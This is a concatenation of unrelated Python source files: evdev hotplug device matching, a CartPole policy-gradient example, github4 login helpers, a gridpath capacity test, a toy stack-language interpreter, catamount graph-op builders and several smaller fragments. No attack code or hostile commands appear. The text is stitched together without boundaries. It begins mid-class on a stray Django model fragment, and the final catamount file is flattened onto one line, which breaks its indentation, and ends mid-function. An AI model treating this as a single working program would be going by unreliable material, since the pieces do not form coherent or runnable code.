    moderators = models.ManyToManyField(CustomUser, related_name="moderators")
    streamkey = models.UUIDField(default=uuid.uuid4, unique=True)
    creator = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
    is_live = models.BooleanField(default=False)

from rltf.schedules.schedule import Schedule
from rltf.schedules.const_schedule import ConstSchedule
from rltf.schedules.exponential_decay import ExponentialDecay
from rltf.schedules.linear_schedule import LinearSchedule
from rltf.schedules.piecewise_schedule import PiecewiseSchedule

import asyncio
from time import sleep

import evdev
import pyinotify

from ev_core.config import Config
from utils.evdevutils import EvDevUtils
from utils.langutils import *


class EventHandler(pyinotify.ProcessEvent):
    """
    This is the central core of our hotplugging.

    We basically use the linux input event system to detect whether all
    needed devices are plugged in, and stop and/or shut our engine down until
    this state is reached or whenever this state is broken.

    see also
    https://www.saltycrane.com/blog/2010/04/monitoring-filesystem-python-and-pyinotify/
    https://github.com/gvalkov/python-evdev/issues/99

    Thanks for everyone on the net for gathering this info
    """

    def __init__(self, config: Config, get_available_devices: callable = None, pevent=None, **kargs):
        super().__init__(pevent, **kargs)
        self._get_available_devices = get_available_devices
        self.devices = []
        self.matched = {}
        self.matched_paths = {}
        self._matched_devices = {}
        self.config = config
        self.all = len(config.orig_data["inputs"]) == 0
        self.init_if_plugged_in()

    def reset(self):
        self.devices = []
        self.matched = {}
        self.matched_paths = {}
        self._matched_devices = {}

    def init_if_plugged_in(self):
        if self.all:
            return
        print("scanning for source devices")
        # wait 2 seconds for the nodes to catch up; sometimes some subdevices
        # need a little bit of time to have their nodes created
        sleep(2)
        devices = self.get_available_devices()
        for device in devices:
            self.handle_match(device, device.path)

    def get_available_devices(self):
        """Gets all available devices which are bound to the evdev api from linux"""
        if self._get_available_devices is not None:
            devices = self._get_available_devices()
        else:
            devices = EvDevUtils.get_available_devices()
        devices.sort(key=lambda dev: save_fetch(lambda: dev.fd, "-"), reverse=True)
        return devices

    def process_IN_CREATE(self, event):
        """
        event handler for the creation function: every time a node is created
        it is matched against our matcher to see whether a new usable device
        was plugged in which can be processed by our rules engine
        """
        if self.all or event.dir or not event.name.startswith("event"):
            return
        asyncio.ensure_future(self.match_device2())

    async def match_device2(self):
        await asyncio.sleep(2)
        self.init_if_plugged_in()

    async def match_device(self, event):
        # we have to retry until the device is unlocked by the generation event;
        # after 10 tries we give up
        save_call(lambda: self.event_match(event))

    def event_match(self, event):
        dev = evdev.InputDevice(event.pathname)
        self.handle_match(dev, event.pathname)

    def handle_match(self, dev, pathname):
        """Match processing method: matches a device against our device rules configuration"""
        matched, input_dev_key = self._device_match(dev)
        if matched:
            self.matched_paths[pathname] = True
            dev.__dict__["_input_dev_key_"] = input_dev_key
            self.devices.append(dev)
            print(" - " + dev.name + " found ")
            if len(self.devices) == len(self.config.inputs):
                print("all devices found")
                self.all = True
                print("Following devices were found:")
                for device in self.devices:
                    print(" - " + device.name)
                self.config.event_emitter.emit("handler_start")

    def process_IN_DELETE(self, event):
        """
        handle delete: whenever a matched device is unplugged we need to shut
        the system entirely down and wait until all the matched devices are
        plugged back in; for the time being it is an all or nothing approach
        """
        if event.dir:
            return
        if not event.name.startswith("event"):
            return
        if event.pathname not in self.matched_paths:
            return
        if self.all:
            asyncio.ensure_future(self.cleanup())

    async def cleanup(self):
        # again we wait a little bit so that all nodes are unlocked after the
        # linux event
        await asyncio.sleep(0.5)
        self.config.event_emitter.emit("handler_stop")
        self.all = False
        self.matched = {}
        self.matched_paths = {}
        self._matched_devices = {}

    def _device_match(self, device: evdev.InputDevice):
        """
        Complex device match: it first checks for a full name or phys match
        and, if not found, tries a re match for name or phys; it also takes
        the rel device position into consideration, which is the relative
        device in multiple matches
        """
        for key in save_fetch(lambda: self.config.inputs, {}):
            name, name_re, phys, phys_re, rel_pos, vendor, product, exclusive, i_max, i_min, i_deadzone = \
                self.config.get_config_input_params(key)
            device_match_string = str(self.config.inputs[key])
            found = Config.full_match(device, name, name_re, phys, phys_re, vendor, product)
            if found:
                if exclusive:
                    try:
                        device.grab()
                    except Exception as e:
                        print(e)
                        pass
                if save_fetch(lambda: self._matched_devices[device_match_string], False) is True:
                    return False, None
                accessor_key = name or phys or name_re or phys_re or vendor or product
                already_processed = save_fetch(lambda: self.matched[accessor_key], 1)
                if already_processed == rel_pos:
                    self._matched_devices[device_match_string] = True
                    return True, key
                else:
                    self.matched[accessor_key] = already_processed + 1
        return False, None


class SourceDevices2:
    """
    A device holder class: determines the devices in the input devices section
    and then stores the ones which match from the inputs section of the config
    """

    def __init__(self, config: Config):
        self.watch_manager = pyinotify.WatchManager()
        self.loop = asyncio.get_event_loop()
        # first we need to initially search
        self.handler = EventHandler(config, self.get_available_devices)
        # second we start an internal watchdog for hotplugging
        self.notifier = pyinotify.AsyncioNotifier(self.watch_manager, self.loop,
                                                  default_proc_fun=self.handler)
        self.watch_manager.add_watch('/dev/input',
                                     pyinotify.IN_CREATE | pyinotify.IN_DELETE,
                                     rec=True, auto_add=True)
        # unless all devices are checked in we do not process any further with
        # the basic initialisation
        # asyncio.set_event_loop(self.loop)
        # asyncio.run(self.awaiter())

    def get_available_devices(self):
        devices = EvDevUtils.get_available_devices()
        devices.sort(key=lambda dev: save_fetch(lambda: dev.fd, "-"), reverse=True)
        return devices

    async def awaiter(self):
        while not self.handler.all:
            await asyncio.sleep(3)

    @property
    def all_found(self):
        return self.handler.all

    @property
    def devices(self):
        return self.handler.devices

    def close(self):
        for device in self.devices:
            try:
                device.ungrab()
            except Exception as e:
                pass
            device.close()
        self.handler.reset()

# -*- coding: utf-8 -*-
"""
Created on Mon May 18 20:14:16 2020

@author: dilayerc
"""

# Practice
# Return the number of times that the string "hi" appears anywhere in the
# given string.
# Examples:
#   count_hi('abc hi ho') → 1
#   count_hi('ABChi hi') → 2
#   count_hi('hihi') → 2

# Answer
def count_hi(string):
    return string.count('hi')

# Tests
print(count_hi('abc hi ho'))  # correct output
print(count_hi('ABChi hi'))   # correct output
print(count_hi('hihi'))       # correct output

class BaseNode:
    pass


class Node(BaseNode):
    def __init__(self, offset, name=None, **opts):
        self.offset = offset
        self.end_offset = None
        self.name = name
        self.nodes = []
        self.opts = opts

    def __as_dict__(self):
        return {"name": self.name,
                "nodes": [node.__as_dict__() for node in self.nodes]}


class Token(BaseNode):
    def __init__(self, offset, value):
        self.offset = offset
        self.value = value

    def __as_dict__(self):
        return {"offset": self.offset, "value": self.value}


class NodeInspector:
    def __init__(self, target):
        if not isinstance(target, Node):
            # fixed: concatenating the class object itself raised a TypeError
            raise TypeError("target should be an instance of Node, not " + str(type(target)))
        self.target = target
        self.names = {}
        self.values = []
        for node in target.nodes:
            if isinstance(node, Node):
                if node.name in self.names:
                    self.names[node.name] += [node]
                else:
                    self.names[node.name] = [node]
            else:
                self.values.append(node)
        if target.opts.get("flatten"):
            if target.opts.get("as_list"):
                if len(self.names) >= 1:
                    nodes = list(self.names.values())[0]
                else:
                    nodes = []
                self.mask = [NodeInspector(node).mask for node in nodes]
            elif len(self.names) >= 1:
                nodes = list(self.names.values())[0]
                self.mask = NodeInspector(nodes[0]).mask
            else:
                self.mask = None
        # elif len(self.names) == 0 and len(self.values) == 1:
        #     self.mask = self.values[0]
        else:
            self.mask = NodeMask(self)


class NodeMask:
    def __init__(self, inspector):
        super().__setattr__("_inspector", inspector)
        super().__setattr__("_offset", inspector.target.offset)
        super().__setattr__("_end_offset", inspector.target.end_offset)
        super().__setattr__("_name", inspector.target.name)

    def __str__(self):
        target = self._inspector.target
        n = target.name
        v = len(self._inspector.values)
        # fixed: iterate items() so the (key, nodes) unpacking works
        s = ", ".join("{}[{}]".format(k, len(nodes))
                      for k, nodes in self._inspector.names.items())
        return "<NodeMask name={}; values=[{}], nodes=[{}]>".format(n, v, s)

    def __getattr__(self, name):
        names = self._inspector.names
        nodes = names.get(name)
        if nodes:
            node = NodeInspector(nodes[0]).mask
        else:
            node = None
        return node

    def __setattr__(self, name, value):
        raise AttributeError

    def __getitem__(self, i):
        return self._inspector.values[i]

    def __len__(self):
        return len(self._inspector.values)

    def __iter__(self):
        return iter(self._inspector.values)

    def __as_dict__(self):
        return self._inspector.target.__as_dict__()

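# Minimal usage sketch for the classes above: build a tiny parse tree by hand
# (the node names and token are illustrative) and read it through a mask.
def _node_demo():
    root = Node(0, name="expr")
    child = Node(1, name="term")
    child.nodes.append(Token(1, "42"))
    root.nodes.append(child)
    mask = NodeInspector(root).mask
    print(mask.term[0].value)  # -> "42"
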
import sys
from functools import partial

from blaze.data import CSV, JSON
from blaze.utils import tmpfile, raises
from blaze.data.utils import tuplify
from blaze.compatibility import xfail

import gzip

is_py2_win = sys.platform == 'win32' and sys.version_info[:2] < (3, 0)


@xfail(is_py2_win, reason='Win32 py2.7 unicode/gzip/eol needs sorting out')
def test_gzopen_csv():
    with tmpfile('.csv.gz') as filename:
        f = gzip.open(filename, 'wt')
        f.write('1,1\n2,2')
        f.close()

        # Not a valid CSV file
        assert raises(Exception, lambda: list(CSV(filename, schema='2 * int')))

        dd = CSV(filename, schema='2 * int', open=partial(gzip.open, mode='rt'))
        assert tuplify(list(dd)) == ((1, 1), (2, 2))


@xfail(is_py2_win, reason='Win32 py2.7 unicode/gzip/eol needs sorting out')
def test_gzopen_json():
    with tmpfile('.json.gz') as filename:
        f = gzip.open(filename, 'wt')
        f.write('[[1, 1], [2, 2]]')
        f.close()

        # Not a valid JSON file
        assert raises(Exception, lambda: list(JSON(filename, schema='2 * int')))

        dd = JSON(filename, schema='2 * int', open=gzip.open)
        assert tuplify(list(dd)) == ((1, 1), (2, 2))

#!/usr/bin/env python3

"""
Simple example of using cherry to solve cartpole.

The code is an adaptation of the PyTorch reinforcement learning example.

TODO: This is not reinforce, this is policy gradient.
"""

import random
import gym
import numpy as np

from itertools import count

import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributions import Categorical

import cherry as ch
import cherry.envs as envs

SEED = 567
GAMMA = 0.99
RENDER = False

random.seed(SEED)
np.random.seed(SEED)
th.manual_seed(SEED)


class PolicyNet(nn.Module):
    def __init__(self):
        super(PolicyNet, self).__init__()
        self.affine1 = nn.Linear(4, 128)
        self.affine2 = nn.Linear(128, 2)

    def forward(self, x):
        x = F.relu(self.affine1(x))
        action_scores = self.affine2(x)
        return F.softmax(action_scores, dim=1)


def update(replay):
    policy_loss = []

    # Discount and normalize rewards
    rewards = ch.discount(GAMMA, replay.reward(), replay.done())
    rewards = ch.normalize(rewards)

    # Compute loss
    for sars, reward in zip(replay, rewards):
        log_prob = sars.log_prob
        policy_loss.append(-log_prob * reward)

    # Take optimization step
    optimizer.zero_grad()
    policy_loss = th.stack(policy_loss).sum()
    policy_loss.backward()
    optimizer.step()


if __name__ == '__main__':
    env = gym.make('CartPole-v0')
    env = envs.Logger(env, interval=1000)
    env = envs.Torch(env)
    env.seed(SEED)

    policy = PolicyNet()
    optimizer = optim.Adam(policy.parameters(), lr=1e-2)
    running_reward = 10.0
    replay = ch.ExperienceReplay()

    for i_episode in count(1):
        state = env.reset()
        for t in range(10000):  # Don't infinite loop while learning
            mass = Categorical(policy(state))
            action = mass.sample()
            old_state = state
            state, reward, done, _ = env.step(action)
            replay.append(old_state,
                          action,
                          reward,
                          state,
                          done,
                          # Cache log_prob for later
                          log_prob=mass.log_prob(action))
            if RENDER:
                env.render()
            if done:
                break

        # Compute termination criterion
        running_reward = running_reward * 0.99 + t * 0.01
        if running_reward > env.spec.reward_threshold:
            print('Solved! Running reward is now {} and '
                  'the last episode runs to {} time steps!'.format(running_reward, t))
            break

        # Update policy
        update(replay)
        replay.empty()

# -*- coding: utf-8 -*-
"""
github4.api
===========

:copyright: (c) 2012-2014 by <NAME>
:license: Modified BSD, see LICENSE for more details

"""
from .github import GitHub
from .github import GitHubEnterprise

gh = GitHub()


def login(username=None, password=None, token=None, two_factor_callback=None):
    """Construct and return an authenticated GitHub session.

    .. note::

        To allow you to specify either a username and password combination or
        a token, none of the parameters are required. If you provide none of
        them, you will receive ``None``.

    :param str username: login name
    :param str password: password for the login
    :param str token: OAuth token
    :param func two_factor_callback: (optional), function you implement to
        provide the Two-factor Authentication code to GitHub when necessary
    :returns: :class:`GitHub <github4.github.GitHub>`
    """
    g = None

    if (username and password) or token:
        g = GitHub()
        g.login(username, password, token, two_factor_callback)

    return g


def enterprise_login(
    username=None,
    password=None,  # restored: the docstring states none of the parameters are required
    token=None,
    url=None,
    two_factor_callback=None,
):
    """Construct and return an authenticated GitHubEnterprise session.

    .. note::

        To allow you to specify either a username and password combination or
        a token, none of the parameters are required. If you provide none of
        them, you will receive ``None``.

    :param str username: login name
    :param str password: password for the login
    :param str token: OAuth token
    :param str url: URL of a GitHub Enterprise instance
    :param func two_factor_callback: (optional), function you implement to
        provide the Two-factor Authentication code to GitHub when necessary
    :returns: :class:`GitHubEnterprise <github4.github.GitHubEnterprise>`
    """
    if not url:
        raise ValueError(
            "GitHub Enterprise requires you provide the URL of"
            " the instance"
        )

    g = None

    if (username and password) or token:
        g = GitHubEnterprise(url)
        g.login(username, password, token, two_factor_callback)

    return g

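# Hypothetical usage sketch for the helpers above; the token and Enterprise
# URL are placeholders.
def _login_demo():
    gh_session = login(token="my-oauth-token")
    ghe_session = enterprise_login(token="my-oauth-token",
                                   url="https://github.example.com")
    return gh_session, ghe_session
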
#!/usr/bin/env python

from distutils.core import setup

setup(name='Mimik',
      version='1.0',
      description='Python framework for markov models',
      author='<NAME>',
      author_email='<EMAIL>',
      url='https://www.python.org/sigs/distutils-sig/',
      packages=['distutils', 'distutils.command'],
      )

# anamileva/gridpath: tests/project/capacity/capacity_types/test_gen_new_lin.py
# Copyright 2016-2020 Blue Marble Analytics LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function

from builtins import str
from collections import OrderedDict
from importlib import import_module
import os.path
import sys
import unittest

from tests.common_functions import create_abstract_model, \
    add_components_and_load_data

TEST_DATA_DIRECTORY = \
    os.path.join(os.path.dirname(__file__), "..", "..", "..", "test_data")

# Import prerequisite modules
PREREQUISITE_MODULE_NAMES = [
    "temporal.operations.timepoints", "temporal.operations.horizons",
    "temporal.investment.periods", "geography.load_zones", "project"]
NAME_OF_MODULE_BEING_TESTED = \
    "project.capacity.capacity_types.gen_new_lin"
IMPORTED_PREREQ_MODULES = list()
for mdl in PREREQUISITE_MODULE_NAMES:
    try:
        imported_module = import_module("." + str(mdl), package='gridpath')
        IMPORTED_PREREQ_MODULES.append(imported_module)
    except ImportError:
        print("ERROR! Module " + str(mdl) + " not found.")
        sys.exit(1)
# Import the module we'll test
try:
    MODULE_BEING_TESTED = import_module("." + NAME_OF_MODULE_BEING_TESTED,
                                        package='gridpath')
except ImportError:
    print("ERROR! Couldn't import module " + NAME_OF_MODULE_BEING_TESTED +
          " to test.")


class TestGenNewLin(unittest.TestCase):
    """ """

    def test_add_model_components(self):
        """
        Test that there are no errors when adding model components
        :return:
        """
        create_abstract_model(prereq_modules=IMPORTED_PREREQ_MODULES,
                              module_to_test=MODULE_BEING_TESTED,
                              test_data_dir=TEST_DATA_DIRECTORY,
                              subproblem="",
                              stage="")

    def test_load_model_data(self):
        """
        Test that data are loaded with no errors
        :return:
        """
        add_components_and_load_data(prereq_modules=IMPORTED_PREREQ_MODULES,
                                     module_to_test=MODULE_BEING_TESTED,
                                     test_data_dir=TEST_DATA_DIRECTORY,
                                     subproblem="",
                                     stage="")

    def test_data_loaded_correctly(self):
        """
        Test that the data loaded are as expected
        :return:
        """
        m, data = add_components_and_load_data(
            prereq_modules=IMPORTED_PREREQ_MODULES,
            module_to_test=MODULE_BEING_TESTED,
            test_data_dir=TEST_DATA_DIRECTORY,
            subproblem="",
            stage="")
        instance = m.create_instance(data)

        # Set: GEN_NEW_LIN_VNTS
        expected_gen_vintage_set = sorted([
            ("Gas_CCGT_New", 2020),
            ("Gas_CCGT_New", 2030),
            ("Gas_CT_New", 2030)
        ])
        actual_gen_vintage_set = sorted(
            [(prj, period) for (prj, period) in instance.GEN_NEW_LIN_VNTS]
        )
        self.assertListEqual(expected_gen_vintage_set, actual_gen_vintage_set)

        # Params: gen_new_lin_lifetime_yrs_by_vintage
        expected_lifetime = OrderedDict(
            sorted(
                {("Gas_CCGT_New", 2020): 30, ("Gas_CCGT_New", 2030): 30,
                 ("Gas_CT_New", 2030): 30}.items()
            )
        )
        actual_lifetime = OrderedDict(
            sorted(
                {(prj, vintage):
                     instance.gen_new_lin_lifetime_yrs_by_vintage[prj, vintage]
                 for (prj, vintage) in instance.GEN_NEW_LIN_VNTS}.items()
            )
        )
        self.assertDictEqual(expected_lifetime, actual_lifetime)

        # Params: gen_new_lin_annualized_real_cost_per_mw_yr
        expected_cost = OrderedDict(
            sorted(
                {("Gas_CCGT_New", 2020): 200000,
                 ("Gas_CCGT_New", 2030): 180000,
                 ("Gas_CT_New", 2030): 140000}.items()
            )
        )
        actual_cost = OrderedDict(
            sorted(
                {(prj, v):
                     instance.gen_new_lin_annualized_real_cost_per_mw_yr[prj, v]
                 for (prj, v) in instance.GEN_NEW_LIN_VNTS}.items()
            )
        )
        self.assertDictEqual(expected_cost, actual_cost)

        # Set: GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT
        expected_gen_vintage_min_set = sorted([
            ("Gas_CT_New", 2030)
        ])
        actual_gen_vintage_min_set = sorted(
            [(prj, period) for (prj, period)
             in instance.GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT]
        )
        self.assertListEqual(expected_gen_vintage_min_set,
                             actual_gen_vintage_min_set)

        # Params: gen_new_lin_min_cumulative_new_build_mw
        expected_min_new_mw = OrderedDict(
            sorted(
                {("Gas_CT_New", 2030): 10}.items()
            )
        )
        actual_min_new_mw = OrderedDict(
            sorted(
                {(prj, v):
                     instance.gen_new_lin_min_cumulative_new_build_mw[prj, v]
                 for (prj, v) in instance.GEN_NEW_LIN_VNTS_W_MIN_CONSTRAINT}.items()
            )
        )
        self.assertDictEqual(expected_min_new_mw, actual_min_new_mw)

        # Set: GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT
        expected_gen_vintage_max_set = sorted([
            ("Gas_CCGT_New", 2020),
            ("Gas_CCGT_New", 2030)
        ])
        actual_gen_vintage_max_set = sorted(
            [(prj, period) for (prj, period)
             in instance.GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT]
        )
        self.assertListEqual(expected_gen_vintage_max_set,
                             actual_gen_vintage_max_set)

        # Params: gen_new_lin_max_cumulative_new_build_mw
        expected_max_new_mw = OrderedDict(
            sorted(
                {("Gas_CCGT_New", 2020): 20, ("Gas_CCGT_New", 2030): 20}.items()
            )
        )
        actual_max_new_mw = OrderedDict(
            sorted(
                {(prj, v):
                     instance.gen_new_lin_max_cumulative_new_build_mw[prj, v]
                 for (prj, v) in instance.GEN_NEW_LIN_VNTS_W_MAX_CONSTRAINT}.items()
            )
        )
        self.assertDictEqual(expected_max_new_mw, actual_max_new_mw)

    def test_derived_data(self):
        """
        Calculations
        :return:
        """
        m, data = add_components_and_load_data(
            prereq_modules=IMPORTED_PREREQ_MODULES,
            module_to_test=MODULE_BEING_TESTED,
            test_data_dir=TEST_DATA_DIRECTORY,
            subproblem="",
            stage="")
        instance = m.create_instance(data)

        # Set: OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE
        expected_periods_by_gen_vintage = {
            ("Gas_CCGT_New", 2020): [2020, 2030],
            ("Gas_CCGT_New", 2030): [2030],
            ("Gas_CT_New", 2030): [2030]
        }
        actual_periods_by_gen_vintage = {
            (prj, v): [period for period in
                       instance.OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE[prj, v]]
            for (prj, v) in instance.OPR_PRDS_BY_GEN_NEW_LIN_VINTAGE
        }
        self.assertDictEqual(expected_periods_by_gen_vintage,
                             actual_periods_by_gen_vintage)

        # Set: GEN_NEW_LIN_OPR_PRDS
        expected_gen_op_periods = [
            ("Gas_CCGT_New", 2020),
            ("Gas_CCGT_New", 2030),
            ("Gas_CT_New", 2030)
        ]
        actual_gen_op_periods = sorted([
            (prj, period) for (prj, period) in instance.GEN_NEW_LIN_OPR_PRDS
        ])
        self.assertListEqual(expected_gen_op_periods, actual_gen_op_periods)

        # Set: GEN_NEW_LIN_VNTS_OPR_IN_PERIOD
        expected_gen_vintage_op_in_period = {
            2020: [("Gas_CCGT_New", 2020)],
            2030: [("Gas_CCGT_New", 2020), ("Gas_CCGT_New", 2030),
                   ("Gas_CT_New", 2030)]
        }
        actual_gen_vintage_op_in_period = {
            p: [(g, v) for (g, v) in
                sorted(instance.GEN_NEW_LIN_VNTS_OPR_IN_PERIOD[p])]
            for p in sorted(instance.PERIODS)
        }
        self.assertDictEqual(expected_gen_vintage_op_in_period,
                             actual_gen_vintage_op_in_period)


if __name__ == "__main__":
    unittest.main()

# nmorse/pounce
# import board
# import pulseio
# from analogio import AnalogIn
# from digitalio import DigitalInOut, Direction, Pull
# import time
# import random
import joyish_tests as testing
import joyish_parser as jp

# Digital input with pullup
# red = DigitalInOut(board.D13)
red = {}
red['value'] = 0
# red.direction = Direction.OUTPUT
# green = DigitalInOut(board.D2)
# green.direction = Direction.OUTPUT

# ToDo:
# ui/repl


def _readIO(s, pl):
    global red
    s.append({'red': red['value']})
    return [s, pl]


def _writeIO(s, pl):
    global red
    a = s.pop()
    red['value'] = a['red']
    return [s, pl]


def _dup(s, pl):
    a = s.pop()
    s.append(a)
    s.append(a)
    return [s, pl]


def _add(s, pl):
    a = s.pop()
    b = s.pop()
    s.append(a + b)
    return [s, pl]


def _sub(s, pl):
    a = s.pop()
    b = s.pop()
    s.append(b - a)
    return [s, pl]


def _prod(s, pl):
    a = s.pop()
    b = s.pop()
    s.append(a * b)
    return [s, pl]


def _n_prod(s, pl):
    # multiply the top two elements, repeating while both are numbers
    if len(s) >= 2:
        a = s.pop()
        b = s.pop()
        if isNumber(a) and isNumber(b):
            s.append(a * b)
            pl.insert(0, 'n*')
            return [s, pl]
        else:
            s.append(b)
            s.append(a)
    return [s, pl]


def _eq(s, pl):
    a = s.pop()
    b = s.pop()
    s.append(a == b)
    return [s, pl]


def _ift(s, pl):
    then_block = s.pop()
    expression = s.pop()
    if expression:
        if isArray(then_block):
            pl = then_block + pl
        else:
            pl.insert(0, then_block)
    return [s, pl]


def _ifte(s, pl):
    else_block = s.pop()
    then_block = s.pop()
    expression = s.pop()
    if expression:
        if isArray(then_block):
            pl = then_block + pl
        else:
            pl.insert(0, then_block)
    else:
        if isArray(else_block):
            pl = else_block + pl
        else:
            pl.insert(0, else_block)
    return [s, pl]


def _get(s, l):  # (dict key -- dict value)
    key = s.pop()
    dictionary = s[-1]
    s.append(dictionary[key])
    return [s, l]


def _set(s, l):  # (dict value key -- dict)
    key = s.pop()
    value = s.pop()
    dictionary = s[-1]
    dictionary[key] = value
    return [s, l]


def _apply(s, l):  # (dict key fun -- dict)
    fun = s.pop()
    key = s[-1]
    s, l = _get(s, l)
    s = run(fun, s)
    s.append(key)
    s, l = _set(s, l)
    return [s, l]


def _swap(s, l):
    a = s.pop()
    b = s.pop()
    s.append(a)
    s.append(b)
    return [s, l]


def _drop(s, l):
    a = s.pop()
    return [s, l]


words = {
    '>io': _readIO,
    '<io': _writeIO,
    'dup': _dup,
    '+': _add,
    '-': _sub,
    '*': _prod,
    'n*': _n_prod,
    '==': _eq,
    'if': _ift,
    'if-else': _ifte,
    'get': _get,
    'set': _set,
    'app': _apply,
    'swap': _swap,
    'drop': _drop,
    'toggle': '[0 1 if-else] app',
    'count-down': 'dup 1 - [ dup 1 - count-down ] if',
    'fact': 'count-down n*'
}

# program_list = '1 redLED 1 greenLED'
# program_list = '1 redLED 1.5 0 1--redLED timeOut'
# program_list = ' 1 redLED 1 0 1--redLED if-then 1 1 1--redLED if-then'
# program_list = ' 0 redLED 1 1 1--redLED if-then'
# program_list = ' 1 0 1--redLED 1 1--redLED if-then-else'


def isTrue(e):
    if e != 0 and e != False and e != 'False' and e != 'false':
        return True
    return False


def isValue(e, fun):
    return (isinstance(e, int) or isinstance(e, float) or isinstance(e, bool) or
            (isinstance(e, str) and not e in fun.keys()))


def isNumber(e):
    return isinstance(e, int) or isinstance(e, float)


def isArray(a):
    return isinstance(a, (list,))


def isDict(a):
    return isinstance(a, (dict,))


# from inspect import isfunction
def isfunction(candidate):
    return not (isinstance(candidate, str) or isinstance(candidate, (list,)))


# def number_or_str(s):
#     try:
#         return int(s)
#     except ValueError:
#         try:
#             return float(s)
#         except ValueError:
#             if s == 'True':
#                 return 'True'
#             if s == 'False':
#                 return 'False'
#             return s


def cmpLists(a, b):
    same = True
    if len(a) == len(b):
        for i in range(len(a)):
            if a[i] != b[i]:
                same = False
    else:
        same = False
    return same


def runScript(program_script, vs):
    pl = jp.parse(program_script)
    return run(pl, vs)


def run(pl, vs):
    global words
    while pl != None and len(pl) > 0:
        next = pl[0]
        pl = pl[1:]
        print(vs, next)
        if isValue(next, words) or isArray(next) or isDict(next):
            if next == 'true':
                vs.append(True)
            elif next == 'false':
                vs.append(False)
            else:
                vs.append(next)
        elif next in words.keys():
            if isfunction(words[next]):
                (vs, pl) = words[next](vs, pl)
            else:
                if isinstance(words[next], str):
                    pl = jp.parse(words[next]) + pl
                else:
                    pl = words[next] + pl
        else:
            print('unknown term or word:', next)
    return vs


print('so far so good... ready to:')


# tests
def runTests():
    print('Starting tests:')
    testCount = 0
    testsFailed = 0
    for test in testing.tests:
        ps = test[0]
        expected_stack = test[1]
        result_stack = runScript(ps, [])
        testCount += 1
        if not cmpLists(result_stack, expected_stack):
            testsFailed += 1
            print(result_stack, ' expected:', expected_stack)
            print('---- Failed test for: ', ps)
            break
    if testsFailed == 0:
        print('All', testCount, 'tests passed.')


runTests()

# while True:  # loop forever
#     print(red)
#     run(['>io', 'red', 'toggle', '<io'], [])
#     print(red)
#     rs = read_rotor()
#     if rs == 1 or rs == -1:
#         stack.append(str(rs))
#         stack.append('rotary')
#         run(stack, words)

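# Quick usage sketch for the interpreter above; assumes the joyish_parser
# module is on the path and that jp.parse converts numeric literals to numbers
# (the commented-out number_or_str helper suggests it does).
def _joyish_demo():
    print(runScript('1 2 +', []))   # expect [3]
    print(runScript('3 fact', []))  # expect [6], via count-down then n*
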
# ---------------------------------------------------------------------------
from ..graph import get_default_graph from ..tensors import * from ..ops.array_ops import * from ..ops.ctrl_ops import * from ..ops.constant import * from ..ops.math_ops import * from ..ops.placeholder import * from ..ops.variable import * def constant(name, out_shape, value=None, graph=None): if graph is None: graph = get_default_graph() const_op = ConstantOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) const_op.addOutput(out_tensor) graph.addOp(const_op) if value is not None: out_tensor.setValue(value) return out_tensor def concat(name, out_shape, input_list, axis=0, graph=None): if graph is None: graph = get_default_graph() if not isinstance(axis, int): raise NotImplementedError( 'catamount.concat axis yet unsupported type: {}'.format(type(axis))) concat_op = ConcatOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) concat_op.addOutput(out_tensor) graph.addOp(concat_op) for input in input_list: graph.addInputToOp(concat_op, input) # Finally, add the axis input tensor last (rank 0) axis_tensor = constant('{}:axis'.format(name), [], axis) graph.addInputToOp(concat_op, axis_tensor) return out_tensor def dynamic_stitch(name, out_shape, indices_list=None, data_list=None, graph=None): if graph is None: graph = get_default_graph() dynstitch_op = DynamicStitchOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) dynstitch_op.addOutput(out_tensor) graph.addOp(dynstitch_op) for input in indices_list: graph.addInputToOp(dynstitch_op, input) for input in data_list: graph.addInputToOp(dynstitch_op, input) return out_tensor def enter(name, input, graph=None): if graph is None: graph = get_default_graph() enter_op = EnterOp(name) out_tensor = Tensor(name, TensorShape(input.shape)) enter_op.addOutput(out_tensor) graph.addOp(enter_op) graph.addInputToOp(enter_op, input) return out_tensor def expanddims(name, out_shape, input, axis=0, graph=None): if graph is None: graph = get_default_graph() if not isinstance(axis, int): raise NotImplementedError( 'catamount.expanddims axis yet unsupported type: {}' .format(type(axis))) expanddims_op = ExpandDimsOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) expanddims_op.addOutput(out_tensor) graph.addOp(expanddims_op) graph.addInputToOp(expanddims_op, input) # Finally, add the axis input tensor last (rank 0) axis_tensor = constant('{}:axis'.format(name), [], axis) graph.addInputToOp(expanddims_op, axis_tensor) return out_tensor def matmul(name, out_shape, in_a, in_b, graph=None): if graph is None: graph = get_default_graph() mm_op = MatMulOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) mm_op.addOutput(out_tensor) graph.addOp(mm_op) graph.addInputToOp(mm_op, in_a) graph.addInputToOp(mm_op, in_b) return out_tensor def placeholder(name, out_shape, graph=None): if graph is None: graph = get_default_graph() ph_op = PlaceholderOp(name) out_tensor = Tensor(name, TensorShape(out_shape)) ph_op.addOutput(out_tensor) graph.addOp(ph_op) return out_tensor def pointwise(name, op_type, out_shape, in_a, in_b=None, graph=None): if graph is None: graph = get_default_graph() op = op_type(name) out_tensor = Tensor(name, TensorShape(out_shape)) op.addOutput(out_tensor) graph.addOp(op) graph.addInputToOp(op, in_a) if in_b is not None: graph.addInputToOp(op, in_b) return out_tensor def reduce(name, op_func, out_shape, input, axes=0, graph=None): if graph is None: graph = get_default_graph() op = ReduceOp(name, axes=axes) out_tensor = Tensor(name, TensorShape(out_shape)) op.addOutput(out_tensor) graph.addOp(op) graph.addInputToOp(op, input) 
